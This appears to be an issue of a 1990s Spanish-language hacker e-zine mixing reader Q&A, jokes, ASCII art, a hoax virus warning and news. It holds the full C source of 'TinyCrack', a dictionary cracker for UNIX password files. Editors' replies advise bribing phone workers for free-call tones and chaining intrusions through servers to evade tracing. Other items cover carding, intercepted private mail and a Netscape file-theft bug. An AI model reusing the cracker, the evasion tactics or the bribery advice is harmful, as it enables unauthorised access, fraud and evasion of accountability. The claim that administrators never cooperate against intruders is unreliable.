Renombra el archivo c:\windows\logos.sys a cualquier cosa y 1 de cada 25
veces que termines una sesion de windows desde el menu inicio saldras al
prompt DOS...

[ Este hack fue probado y comprobado en varias computadoras y seguramente
les servira a todos los que usen windows 95 en el trabajo. Lo malo es que
eso de 1 de cada 25 no es cierto, bien podria ser 1 de 50... ]

//////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\

¨ Que ondas con eso de "
el gran hermano te esta vigilando" que esta en las
paginas de hackers por todos lados (Big Brother) ?

[ La linea "
Big Brother is watching you" es usada en la mayoria de las
paginas de hackers aunque la mayoria no sabe ni que diablos significa. Como
en raregazz nos jactamos de saberlo (o averiguarlo) todo >:-> les vamos a
dar una peque¤a catedra -aun gratuita- sobre lo que significa ese slogan
y el origen... -ahi pa'que no digan los de la SEP-

-=1984=-
George Orwells escribio un libro llamado 1984 donde describia una sociedad
donde no existia la privacidad ni la libertad del pensamiento (semejanzas?).
Existia en esa civilizacion (o deberia decir imbecivilizacion) el jefe
supremo que era llamado "
El gran hermano".
En esa sociedad existia si no me equivoco, una "
policia del pensamiento" que
se encargaba de regular a todos los rebeldes de la epoca. Una vez capturados
los 'insurgentes' eran llevados a campos de tortura donde los hacian quedar
como vegetales por el resto de sus dias (lease escuelas y academias).
El estado controlaba y vigilaba por medio de unas pantallas que deberian
estar en cada casa y lugar de reuniones (ahora se conocen como televisores)
y a diferencia de las que nosotros conocemos, estas permitian ver al Estado
que es lo que hacian las personas del otro lado de la pantalla (un poco como
el email no crees?). Cada dia eran reglamentarios los "
tres minutos de odio"
en la telepantalla que hacian lo que el futbol en estos dias...

Si quieres saber como termina un hombre y una mujer libres de pensamiento
(el hombre no es Zimmerman) que decidieron ir en contra de un Gobierno
Totalitario, Despota, Fascista, Armamentista y anti-democratico (lo siento
Fujimori pero no es su gobierno, hablaremos de cobardes y traidores en otro
numero :-) no dejes de checar este libro y conocer aun mejor la cultura
hacker y su lema "
Libertad de Informacion y Pensamiento".

1984
Por George Orwells ]

//////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\

Nombre del codigo: TC.C
Para Compilar: gcc -O2 tc.c -o tc
Descripcion: Programa que tiene la basica funcion de crackear los
passwords en un sistema UNIX usando el campo geko, logins
y una lista de palabras standard.
..............................................................................

*/

#include <stdio.h>
#include <string.h>

#define fetch(a,b,c,d) {fgets(a,130,b); c=strtok(a,"
:"); d=strtok('\0',":");}

main()
{
FILE *p,*o,*w;
char i[50],pes[130],pas[50],pps[50],pws[50];
char *es=pes,*as=pas,*ps=pps,*ws=pws;

printf("
\nTinyCrack v1.0 Bluesman 1/95 - RaGE Mag Release!\n\n");
printf("
Password File: "); gets(i);
p=fopen(i,"
r");
printf("
WordList File: "); gets(i);
w=fopen(i,"
r");
printf("
Results File : "); gets(i);
o=fopen(i,"
w");

fprintf(o,"
*** TINYCRACK v1.0 ***\n\n*** PASS 1: NULL PASSWORDS ***\n");

while(ps)
{
fetch(es,p,as,ps);
if(ps) if(ps[-1]==':') fprintf(o,"
| User [%s] has no password!\n",as);
}

fflush(o); rewind(p);

fprintf(o,"
*** PASS 2: ACCOUNT NAMES ***\n");

do
{
fetch(es,p,as,ps);
if(ps) if(!strcmp((char *)crypt(as,ps),ps))
fprintf(o,"
| User [%s] has password [%s]\n",as,as);

} while(ps);

fflush(o); rewind(p);

fprintf(o,"
*** PASS 3: DICTIONARY WORDS ***\n");

do
{
rewind(w);
fetch(es,p,as,ps);

do
{
fgets(ws,130,w);
ws[strlen(ws)-1]=0;

if(!strcmp((char *)crypt(ws,ps),ps))
{
fprintf(o,"
| User [%s] has password [%s]\n",as,ws);
fflush(o);
break;
}

} while(!feof(w));

} while(!feof(p));

fprintf(o,"
*** FINISHED SESSION ***\n");
exit(1);

}
..............................................................................

//////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\

rared00dz: aqui les envio algunos de los mensajes que hemos interceptado de
servidores mexicanos que son totalmente inservibles para nosotros pero
resultan comicos o interesantes...

-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|

> Unos chistes:
>
> 1) Esta Pedrito en la clase de historia y le preguntan:
> A ver Pedrito quien descubrio America?
> - No lo se , se¤orita................
> muy mal , Pedrito, muy mal......bueno hay alguien quien lo sepa?
>
> Entonces se levanta un japones que habia en la clase y contesta:
> Colon, honorable se¤olita........
> Al momento se oye una voz que dice:
> MALDITOS JAPONESES!!!!!
>
> la se¤orita muy enfadada pregunta:
> Quien dijo eso?????
> Pedrito se levanta y responde:
> General Mc Arthur,1945.........
>
>
> 2) Mama,mama en el colegio me han llamado mafioso.
> -Bueno hijo ya ire yo ma¤ana a arreglar eso.
> -Bueno mama, pero que parezca un accidente.................
>
> 3) Esto es un misionero que esta en plena selva y se encuentra de bruces
> con un leon que estaba casi muerto de hambre . El misionero se asusta y se
> pone de rodillas, empezando a rezar dice:
> Padre infunde a este pobre leon sentimientos cristianos......
> Se oye un silencio y de buenas a primeras el leon se pone de rodillas,
> diciendo: Padre, bendice estos alimentos que voy a recibir.............
>
>
> 4) Que pena......no puedo usar windows........mi gato se ha comido el
> raton.......
>
> 5) Sabes como dejas intrigado a un cerdo?
> -Ma¤ana te digo.......
>
> 6) Entre dos locos:
> A ver si adivinas lo que tengo en la mano?
> Un elefante....
> no vale!! Me has visto.........
>
> 7) Nunca me olvidare la ultima frase de mi padre.....:
> Paco no muevas el
> andamioooooooooooooooooooooooooooooooooooooo..............
>
> 8) un empleado a su jefe:
> Si no puede usted aumentarme el sueldo.....porque no me lo da mas a
> menudo????
>
> Ah y la nueva frase que he acuñado :
> No es lo que pasa.....sino como pasas,lo que pasa
>
> {{{ }}} Montse (en lenguaje cibernetico es un abrazo)

-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|

Que onda?, Aqui les mando un mail que, si saben Unix, les va a gustar...
Bye....

.....McLeod

HOW THE WORLD WAS CREATED...BY COMPUTER
_____________________________________________________________

IN THE BEGINING
(To justify God's ways to the 21st century)

In the begining was the computer. And God took a sit in front of it and
this is what happened :
#************************************
#* Welcome to SimUniverse Computers *
#************************************
#Please Enter your login name : God
#password : omniscient
#
#login or password incorrect , try again
#password : omnipotent
#login ok.. entering system

And God signed on 12:01 a.m., Sunday, March 1.

$ Let there be light!
# Unrecognizable command. Try again!
$ Create light
# Done.
$ Create heaven
# Done.
$ Create earth
# Please wait... terraforming... calculating... Done.
$ Run heaven and earth
# Done.

And God created Day and Night. An God saw there were 0 errors.
And God signed off at 12:02 a.m., Sunday, March 1.

# Approx. funds remaining: $92.50.

And God signed on at 12:00 a.m., Monday, March 2.

$ Let there be firmament in the midstm of the water and
# Unrecognizable command. Try again!
$ Create firmament
# Done.
$ Run firmament
# Done.

And God divided the waters. And God saw there were 0 errors.
And God signed off 12:02 a.m., Monday, March 2.

# Approx. funds remaining: $84.60.

And God signed on at 12:00 a.m., Tuesday, March 3.

$ Let the waters under heaven be gathered together unto one place
and let the dry land appear and
# Too many characters in string especification! Try again!
$ Run dryland
# Done.

And God created Earth and Seas. And God saw there were 0 errors.
And God signed off 12:01 a.m., Tuesday, March 3.

# Approx. funds remaining: $65.00.

And God signed on at 12:00 a.m., Wednesday, March 4.

$ Create lights in the firmament to divide the day fron the night
# Unspecified type. Try again!
$ Create sunmoonstars
# Done..

And God created Sun, Moon, Stars. And God saw there were 0 errors.
And God signed off 12:01 a.m., Wednesday, March 4.

# Approx. funds remaining: $54.00.

And God signed on at 12:00 a.m., Thursday, March 5.

$ Create fish
# Done.
$ Create fowl
# Done.
$ Run fish'nfowl
# Done.

And God created the great seamonsters and every living creature
that creepeth wherewith the waters swarmed after its kind and
every winged fowl after its kind. and He saw there were 0 errors.
And God signed off 12:01 a.m., Thursday, March 5.

# Approx. funds remaining: $45.60.

And God signed on at 12:00 a.m., Friday, March 6.

$ Create cattle
# Done.
$ Create creepy things
# Done.
$ Now let us make man in our image
# Unspecified type! Try again!
$ Create man
# Done.
$ Be fruitful and multiply and replenish the earth and subdue it
and have dominion over the fish of the sea and over the fowl
of the air and over every living thing that creepeth upon the
earth
# Too many command operands! Try again!
$ Run multiplication
# Execution terminated. 6 errors.
$ Insert breath
# Done.
$ Run multiplication
# Execution terminated. 5 errors.
$ Move man to Garden of Eden
# File ``Garden of Eden'' not found.
$ Create Garden
# Done.
$ Move man to Garden of Eden
# Done.
$ Run multiplication
# Execution terminated. 4 errors.
$ Copy woman from man
# Done.
$ Run multiplication
# Execution terminated. 3 errors.
$ Insert woman into man
# Illegal parameters! Try again!
$ Insert man into woman
# Done.
$ Run multiplication
# Execution terminated. 2 errors.
$ Create desire
# Done.
$ Run multiplication
# Done.

And God saw the man'n woman being fruitful and multiplying in the
Garden

# Execution for Warning: No time limit on this run. 1 errors.
$ Create freewill
# Done.
$ Run freewill
# Done..

And God saw the man'nwoman being fruitful and multiplying in the
Garden

# Execution Warning: No time limit on this run. 1 errors.
$ Undo desire
# Desire cannot be undone once freewill is created
$ Destroy freewill
# Freewill is an inaccesible file and cannot be destroyed.
# Enter replacement, cancel, or ask for help.
$ Help!
# Desire cannot be undone once freewill is created.
# Freewill is an inaccesible file and cannot be destroyed.
# Enter replacement, cancel, or ask for help.
$ Create treeofknowledge

And God saw the man'nwoman being fruitful and multiplying in the
Garden

# Execution Warning: No time limit on this run. 1 errors.
$ Create good'nevil
# Done.
$ Activate evil
# Done.

And God saw he had created shame.

# Warning: System error in sector E96. Man'nwoman not in the Gard.En. 1
errors.
$ show Garden
# Not found.
$ Search Garden for man'nwoman
# Searching.... Search Failed . Not Found.
$ Delete shame
# Shame cannot be deleted once evil has been activated.
$ Destroy freewill
# Freewill is an inaccesible file and cannot be destroyed.
$ Stop
# Unrecognizable command. Try again!
$ Break
$ Break
$ Break
# ATTENTION ALL USERS: ATTENTION ALL USERS:
# COMPUTER GOING DOWN FOR REGULAR DAY OF MANTENANCE
# PLEASE SIGN OFF
$ Create new world
# You have exceeded your allocated file space. Please delete old files.
$ Destroy earth.
# Destroy earth. Please confirm.
# Confirmation Timed out. Cancelling Action.
COMPUTER DOWN. COMPUTER DOWN
# SERVICES WILL RESUME ON SUNDAY MARCH 8 AT 6:00 A.M
# YOU MUST SIGN OFF NOW!
# You have been disconected from SimUniverse Server.
And God signed off at 11:59 p.m., Friday, March 6.
And God saw he had zero funds remaining.

HiGhLaNdEr
LeT YoUr SoUl Be YoUr PiLoT

-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|


(__) )__( vv vv
(oo) (oo) ||----|| *
/-------\/ *-------\/ || | /
/ | || / | || /\-------/
* ||----|| / ||----|| (oo)
^^ ^^ vv vv (~~)

USA Vaca Nerd USA Vaca Vaca Australiana

(__) (__) (__)
(00) (-o) (--) . . . (*>YAWN<*)
/------\/ /------\/ /------\/
/| || /| || /| ||
* ||----|| * ||----|| * ||----||

Vaca con lentes Vaca Coqueta Vaca sin dormir

O__O \_|_/
(oo) (oo)
/-------\/ /-------\/
/ | || / | ||
* ||----|| * ||----||
^^ ^^ ^^ ^^
Vaca en Disneylandia Vaca visitando la estatua de la libertad

\ (__) (__) * (__)
\\(oo) (\/) \ (oo)
/-----\\\/ /-------\/ \-------\/
/ | (##) / | || 8-| ||
* ||----||"
* ||----|| ||----||
^^ ^^ ~~ ~~ ^^ ^^
Vaca escocesa tocando gaita Vaca de Beijing

* (__) (__) (__) (__)
\ (oo) (oo) (oo) (oo)
\-------\/ /-------\/ /-------\/ /-------\/
/| |\ / / \ / \ / / \ \
//||----||\\ * //------\\ * \\--// * \\----\\
^ ^^ ^^ ^ ^ ^ ^ ^ ^ ^
Vaca caminando Vaca trotando Vaca corriendo Vaca frenando

(__)
(oo) (__) * (__)
\/ (oo) | (oo)
____| \____ /-------\/ o=o=o=|------\/
---/ --** / | / | |
*____/ |___// * ||----|| ||----||
//--------/ ^^ ^^ ^^ ^^
//__
Vaca marchando Vaca parada Vaca cagando

(__)
(oo) U
/-------\/ /---V
/ | || * |--| .
* ||----||
^^ ^^
Vaca a 1 metro. Vaca a 100 metros. Vaca a 10,000 metros.

(__) (__) (__) (__)
(oo) (oo) (oo) (oo)
/-------\/-* /-------\/ /-------\/ ~~~~~~~~~~~~~~~~~
/ | || \ )*)(\/* / * / | ||
* ||----|| * \ |||/)|/()( ~~~~~~~~~~~~~~
\/|(/)(/\/(,,/ \)|(/\/|)(/\
Vaca comiendo Vaca comiendo Vaca en agua Vaca nadando
pasto vaca

(__) (__) (__)
(OO) (@@) (xx)
/-------\/ /-------\/ /-------\/
/ | || / | || / | ||
* ||----|| * ||----|| * ||----||
^^ ^^ ^^ ^^ ^^ ^^

Vaca que tomo Jolt Vaca que comio hongos Vaca que uso Jolt para lavar
psychodelicos hongos psychodelicos

)\ (__)
/ \ (oo)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vaca nadando en agua con tiburones

( ( )
( ( ) )
( ( )
( / )
( ( \\ )
( | // )
| | (__)
| | (oo) (__)
| | ----\/ ______(oo)_____
| | || ( _)_______(__) )
**| | ---|| \ __________/
``'---------^^
Vaca escondida Pay de vaca

*
** **
* ** * * * **
* / / \ * *
\

  
\ / \ / / (__)
* / / \ \ (__) \ \ /--------(00)
/ (00) / / / | |( )
\ /-------\/ \ \ * ||---- ||()
/ / | || / / || ||
\ \ * ||----|| \ \ ^^ ^^
/ / ^^ ^^ / / Vaca masticando canicas
Vaca en calor

(__) (__) * (__) * (__)
(oo) (oo) \ (oo) | (oo)
/--------\/ /-oooooo-\/ \-------\/ \-------\/
* o| || * ooooooooo o o| || / ||
||----|| ooooooooooooo ||----||>==/-----||
ooo^^ ^^ ooooooooooooooooo ^^ ^^ ^^
Vaca cagando Vaca en deep shit Vaca que le estan pateando
la caca fuera de ella
/\ __
/ \ ||
(__) (__) \ / (_||_)
SooS (oo) \/ (oo)
/------S\/S /-------\/ /S /-------\/
/ | || / | || / S / | ||
* ||----|| * ||----||___/ S * ||----||
^^ ^^ ^^ ^^ ^^ ^^
Vaca de George Washington Vaca de Ben Franklin Vaca de Abe Lincoln
(__)
(__) (oo)
(oo) /'^^^-m
/---+ +--\/ / '' ` )
/ | | | || | /|
* ||-+ +-|| | | | |
^^ ^^ |_____|_|
Vaca de David Copperfield //|| ||
* ww ww
Vaquidracula

(__) (__) (__)
(\/) ($$) (**)
/-------\/ /-------\/ /-------\/
/ | 666 || / |=====|| / | ||
* ||----|| * ||----|| * ||----||
^^ ^^ ^^ ^^ ^^ ^^

Vaca satanica Vaca Yuppie Vaca enamorada

(____) (____)
(oo ) (o o)
/-----------\ / /-----\ /----
/ || | \/ / | | \/ |
/ || |||| \ | | | | |
* ||||-----|||| *| | |-----| | |
/\/\ /\/\ /\ /\ /\ /\
Vaca de Pablo Picasso Vaca de Salvatorre Dali

(__)
^^ (oo)
^^^^ /-------\/
^^^^^ / | ||
^^^^^ * ||----||
^^^^^^^^ ====^^====^^====
^^^^^^^^^^^^^/
^^^^^^^^^^^^^^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Vaca surfeando en Malibu
*
\
\
|\
\ | \ (__)
\\|| \(oo)
\||\ \\/
^^ \||
\\ ||
\\||
\||
^^
\\_
\_
Vaca skiando en Aspen Colorado

o o (__) ^
\ / (oo) /
\ / _____\/___/
(__) \__/ / /\ / /
(oo) _______(oo) ^ / * /
/---------\/ /| ___ \/ / ___/
/ | x=a(b)|| / | { }|| *----/\
* ||------|| * ||{___}|| / \
^^ ^^ ||-----|| / /
^^ ^^ ^ ^

Vaca Matematica Vaca de T.V. Vaca bailando disco despues
aspirar cow-caine

o
| [---]
| |
| | |------========|
/----|---|\ | **** |=======|
/___/___\___\ o | **** |=======|
| | ___| |==============|
| | ___ {(__)} |==============|
\-----------/ []( )={(oo)} |==============|
\ \ / / /---===--{ \/ } |
----------------- / | NASA |==== |
| | * ||------||-----^
----------------- || | |
/ / \ \ ^^ ^ |
/ ---- \
^^ ^^ Vaca llegando a la Luna

//////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\

A TODOS LOS USUARIOS DE INTERNET
INFORMACION PROVENIENTE DE IBM INTERNACIONAL

Este mensaje debe ser comunicado a cualquier persona que tenga acceso
a Internet.

Si alguien recibe un mensaje de correo electronico llamado "Pental
Greetings"
, por favor BORRARLO SIN ABRIR!!!

Esta es una advertencia para todos los usuarios de internet. Existe un
virus muy peligroso que esta distribuyendose a traves de la red de
Internet y llamado " PENPAL GREETINGS".

NO ABRIR EL MENSAJE LLAMADO "PENPAL GREETINGS" !

Este mensaje aparenta ser una carta amigable preguntandole si usted
esta interesado en penpal (??), pero para el tiempo que Usted lea el
mensaje, es demasiado tarde!!: el virus "TROJAN HORSE" habra infectado
ya el sector boot de su sistema, BORRANDO TODOS SUS DATOS. Este es un
virus auto-regenerable y tan pronto como el mensaje ha sido leido, se
expandera automaticamente a todas las direcciones de correo
electronico contenidas en su directorio (Mail box). Este virus
destruira su disco duro y tiene el potencial de destruir el disco duro
de cualquiera presente en su directorio.

Si el virus se sigue propagando, podria causar danos catastroficos en
la red mundial de Internet!

Asi que por favor, BORRE el mensaje "PENPAL GREETINGS" antes de
leerlo!! y envie este mensaje a todas las personas que conozca y que
usen Internet para advertirlos acerca de este virus!!

[ La estupidez *si* crece en los arboles... ]

//////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\

Como limpio el Cache de mi browser??

[ si usas microsoft explorer simplemente borra todos los archivos que tengas
en el directorio C:\WINDOWS\CACHE Si usas Netscape borra los archivos que
tengas en c:\netscape\cache o c:\program files\netscape\cache Existe otra
forma mas "chic" de hacerlo y es en opciones, limpiar cache o en
configuracion, network preferences, clean disk cache. ]

//////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\

me gustaria tener los codigos de telefonos para llamar gratis de mi pais,
como podria conseguirlos ??

[ simplemente consigue un billete de 20 dolares (puede ser falso) y cuando
veas a tu trabajador telefonico mas cercano acercate, cuentale lo mucho
que te gustaria conocer el sistema telefonico y cuando menos lo espere...
BAMM! Ofrecele los 20 dolares a cambio de los tonos para marcar gratis
que alguien te platico, si no acepta o dice que no existen entonces
preguntale por claves para llamar gratis. Generalmente aceptan y no es
delito en caso de amenazarte retirate y espera la proxima camioneta
telefonica :-) No te dejes cuando te pida tu direccion, si no los tiene y
te dice que luego pasa a dejarte los tonos grabados en un cassette citalo
en una esquina lejos de tu casa y si puedes prueba los tonos antes de
entregarle el dinero. ]

//////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\

empezando en este rollo , aparte de ser muy padre y me gustaria saber como
colaborar con ustedes , espero pronto su respuesta ! GrAcIaS !!

[ para colaborar con nosotros envia todo lo que puedas a RareGaZz@Bigfoot.com
links a software, revisiones de peliculas, revistas y modos de vida son
bienvenidos. Esta revista es para ustedes unicamente y de ustedes depende
que siga saliendo como hasta el momento. ]

//////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\

Bueno, les planteo algo (para fines educacionales, logico)
necesito hallar los passwords que configure de unos emails...
resulta que ya configure el netscape. Lo que me falta es unicamente
mandar un programa que sea compatible con Windows y que pueda
utilizar para el netscape. Un programa busca passwords.

[ Si alguien tiene informacion sobre los passwords en netscape navigator
o tienen un programa que saque el pass de ese programa envienlo...]

//////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\

HAL-9000 BBS Internet - Morelia UMSHN - Universidad Michoacana de San Nicolas

HAL-9000 BBS Internet es el nuevo hermano de HAL-9000 Fidonet el originalismo
HAL-9000 BBS. Este tiene la ventaja de que puede ser accesado via Internet,
de cualquier parte de mundo, ademas de que es multiusuario.
El enfoque de este BBS es hacia foros o boards;tambien tiene capacidad de
chat. Actualmente esta configurado para aceptar unicamente 10 conexiones
simultaneas.

Para accesar HAL-9000 BBS Internet :
telnet://bbs.ccu.umich.mx

IMPORTANTE: En respuesta al login escribe bbs y return, cuando pida el
password.

//////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\

Si por algun motivo no pueden entrar a i-net para obtener su copia de este
E-Zine o quieren entrar en ambiente hacker en Mexico DF pueden marcar el
numero 280-2899 de Alfa BBS...chequenlo y luego me cuentan que tal ok?

ALFA BBS 280-2899 Mexico D.F.,

//////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\

sobre algo que habian dicho en uno de los numeros de la revista sobre el
hackear con condon, tengo una duda... no importa que tan lejos o que tan
cerca esten los servidores a donde te conectas antes de llegar a tu objetivo?
por ejemplo. podria conectarme a 4 distintos servidores que estan dentro de
la ciudad de mexico y despues llegar a mi objetivo , igual dentro de la
ciudad y no habria problema de rastreo? bueno, ojala que me contesten pronto!

[ La razon de hackear a travez de varios servidores es unicamente para que
a las personas que quieran rastrearte se les dificulte el tener que andar
revisando logs de distintos servidores. Obviamente si hackeaste al servidor
blanco a travez del servidor negro y gris, cuando el administrador quiera
llegar a ti necesita pedir ayuda al administrador del servidor negro para
localizar al usuario que lo hackeo. Despues el administrador del servidor
negro notara que el hacker no es un usuario local sino que entro desde el
servidor gris por lo que el tambien necesitaria pedir ayuda al otro
administrador y asi... Obviamente NUNCA UN ADMINISTRADOR PEDIRA AYUDA A
OTRO PARA AGARRAR A UN HACKER!!! Hacerlo significaria aplastar su orgullo
para decir "un hacker me supero y entro a mi sistema".Y en caso de hacerlo,
si el hacker uso otro ordenador para entrar a hackear,el otro administrador
probablemente no se atreva a contestar "ese hacker tambien burlo mi
seguridad entrando desde X sistema"
por lo que generalmente le dira que no
encontro nada en sus logs y todo el asunto se olvidara y asi ninguno de los
dos administradores perdera su trabajo. Creanme esto que les digo, en mi
carrera de hacker he conocido a muchos admins y conozco sus formas de
pensar. Obviamente no todos los admins son iguales pero aquellas raras
excepciones *realmente* se esmeran en proteger sus sistemas y no tienen
problemas de hackers :) perdon por la respuesta tttaaaannnn larga . . . ]

//////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\

Todos ustedes habran escuchado la noticia sobre las carreteras de Los Angeles
California. Es probable que dentro de poco tiempo los carros circulen por
esos caminos sin intervencion humana; asi es, la persona detras del volante
tendra manos y piernas libres mientras el carro ayudado por satelites y
emisores electricos en el camino maneje por la carretera. Esto es genial,
sobre todo en la ciudad sede del descubrimiento ya que en Los Angeles como
en cualquier parte del mundo es dificilisimo disparar una escopeta mientras
se maneja :-)
Afortunadamente el software que controlara las habilidades de manejo del
automovil no sera creado (en el momento) por Microsoft de lo contrario las
prisiones se inundarian de malos programadores ya que por primera vez sus
BUGS costaran no solo frustracion para el usuario, sino sus vidas... :)
raretrip

//////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\

Pues aqui molestando de nuevo y tengo una duda, bueno mas que una duda
es una peticion:
En su numero 4 lei su articulo sobre CARDING ademas de que en un numero
anterior lei el articulo sobre INGENIERIA SOCIAL por lo que estoy muy
interesado sobre el CARDING.
Asi que quisiera poder leer otro articulo sobre CARDING para ir aumentando
mis conocimientos sobre este tema.

[ proximamente escribire una continuacion del texto por Mr.X basado en
algunas experiencias de amigos ... >:-) ]

//////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\

Ferca Network: http://www.ferca.net
Web Personal: http://www.ferca.net/ferca
Lo que es gratis en Internet: http://www.ferca.net/esgratis

A nosotros nos llego la invitacion a este sitio y espera le envien sus
comentarios sobre toda la informacion que tiene disponible en su pagina.
[ El link ya esta en la pagina web seccion internet. CkSmkr ]

- = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = -

http://www.class.udg.mx/~victorov/

Si les gustan los virus o quieren aprender como esta eso de la inteligencia
artificial visiten esta pagina. Tal vez luego nos haga un resumen de su
trabajo con los virus para la revista :-)
P.D. Gracias a el conseguimos el virus ZHENGXI !
[ El link esta en la seccion de hacking en la pagina web. CkSmkr ]

La revista dejara de hacer las 'rese¤as' desde este numero. La ultima vez que
puse links fue por agradecimiento a unas paginas que usaron uno de nuestros
logos para poner un link a la pagina.

//////////// \\\\\\\\\\\ //////////// \\\\\\\\\\\\ //////////// \\\\\\\\\\\

GR337Z 4 70D0S L0S Qu3 N0S 4YuD4N 4 3L4B0R4R 3S74 R3ViS74 Y 74MBi3N 4 L0S
Qu3 N0S 4YuD4N C0N L4 P4GiN4 W3B C0N C0M3N74Ri0S Y/0 GR4FiC4S. 3N 3SP3Ci4L
uN S4LuD0 C0M0 Si3MPR3 4 V0V_77, 7uC4NX, 4RK4NG3L, 4CiDGuM, RiCKY, M3G4FL0P,
XD4WN, GuYBrU2H Y 4 70D0S L0S CHiC0S M4L0S D3 RDK.
S4LuD0S 3SP3Ci4L3S V4N P4R4 GR00VY Y S3RV3RH4CK3R P0R S4C4R 4D3L4N73 Nu3S7R4
0LViD4D4 S3CCi0N D3 N07iCi4S. 0K! L0S CR3Di70S H4N SiD0 D4D0S...

[ culpese a los hackers de la degeneracion de la escritura. CkSmkr ]

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<

/ \ /\\ /\ /\ //\\
/\ / /\ // \\ /\ \ /\ / / // \\
/ /\ \ / / /\/ \ \ / /\ \ / / //
__/ / \_/ // \ \/ / \ \ / / //
__/ \ \ \ \ \/ \/ // /\
\\ //
Cuando matas a un hombre, eres asesino \/
Cuando matas muchos, eres un conquistador
Cuando matas a todos... eres un dios.
Megadeth

Bienvenidos a la primera *verdadera* seccion de noticias en una revista
electronica. Para ser la primera vez que hacemos esta seccion nosotros creo
que nos quedo aceptable >;)
Disfruten esta nueva presentacion de NotiLOONS; manden sus comentarios y
noticias...

( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

En su convencion anual la asociacion britanica de medicos recomendo legalizar
los quimicos que alteran los sentidos de la marijuana.

( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

Netscape BUG

Netscape dice que cuando aparezca un boton de "warning" en un sitio inseguro,
presionen CANCEL.

Netscape dice que es un bug no muy serio pero esto depende de cada persona.
yo creo que un bug que permita buscar archivos en tu disco duro y luego
subirlos a la pagina es bastante serio...pero netscape no lo piensa asi.

Todos saben que netscape tiene una funcion que permite subir archivos de tu
disco a un servidor verdad? pues el bug permite hacer esto sin que el usuario
se de cuenta! la unica cosa necesaria es saber la localizacion exacta del
archivo deseado. Un ejemplo seria agarrar el c:\netscape\cache\fat.db del
disco de algun visitante para ver el nombre de las paginas y el URL de cada
lugar que haya visitado. existen mas formas de explotar este bug.

( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

Alemania a aprobado la primera gran ley de internet, diciendo que es un
crimen poner contenido ilegal en Alemania si es tecnica y razonablemente
posible prevenirlo. Las penas estan en duda aun.

( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

El "profesional en sistemas" -como prefiere que lo llamen- que descubrio el
BUG en el servidor de microsoft ha decidido no cooperar con microsoft para
cualquier problema relacionado con la seguridad debido al "mal trato" que
recibio de la compa¤ia del magnate Gates.
La persona esta que niega ser un "hacker" a empezado a vender con exito en
su sitio web camisetas con la leyenda "I crash the microsoft website and all
i got was this damn t-shirt"
(Yo estrelle el sitio de microsoft y todo lo que
me dieron fue esta maldita camiseta). Esto es una broma a microsoft que le
ofrecio una camiseta y descuento en cupones para software por su ayuda.
Actuando como todo el hacker que dice no ser, no acepto la oferta de
microsoft y se niega a cooperar en futuras ocasiones con esa compa¤ia.

( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

Varias redadas en la ciudad de Madrid con motivo de operativos policiales para
derribar a los hackers que habitan en el pais de Espa¤a.
Los operativos han sacado momentaneamente de circulacion a un popular servidor
de paginas web gratuitas (www.islatortuga.com) para hackers pero ya esta de
nuevo on-line al parecer no por mucho tiempo.

( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

Ahora que el Partido Revolucionario Institucional (PRI) ya no tiene la
mayoria en la camara de diputados, se corre el riesgo de una !! DIVISION DEL
PODER EN MEXICO !!
Concretamente el riesgo es que se divida el poder en Legislativo, Judicial
y Ejecutivo... cosa que destruiria a Mexico >:-]

El Chamuco a¤o 1 numero 36
~~~~~~~~~~~~~~~~~~~~~~~~~~
( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

El dictador de Peru Alberto Fujimori esta a punto de ser corrido a patadas
de su propio pais por haber introducido el modelo economico neo-liberal.
Hermanos peruanos nosotros los mexicanos se los decimos por experiencia,
